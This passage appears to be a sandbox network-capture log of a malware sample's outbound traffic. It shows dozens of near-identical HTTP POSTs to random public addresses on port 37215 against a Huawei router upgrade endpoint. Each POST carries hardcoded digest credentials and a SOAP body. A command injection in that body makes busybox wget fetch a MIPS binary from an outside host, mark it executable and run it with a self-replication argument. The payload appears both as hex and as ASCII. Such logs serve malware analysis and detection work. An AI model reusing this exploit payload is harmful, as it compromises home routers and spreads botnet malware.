                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          563192.168.2.1547542157.8.30.13237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.596338987 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          564192.168.2.1541072197.69.212.19037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.596409082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          565192.168.2.1556522134.182.173.12737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.596510887 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          566192.168.2.1552172186.67.50.9037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.596580029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          567192.168.2.1539944197.49.90.11737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.596800089 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          568192.168.2.1548214117.252.188.12137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.596817970 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          569192.168.2.1544536197.89.207.20337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.596839905 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          570192.168.2.1560254197.68.110.22137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.596853018 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          571192.168.2.1555692157.252.242.2837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.596884012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          572192.168.2.1542676197.87.169.637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.596895933 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 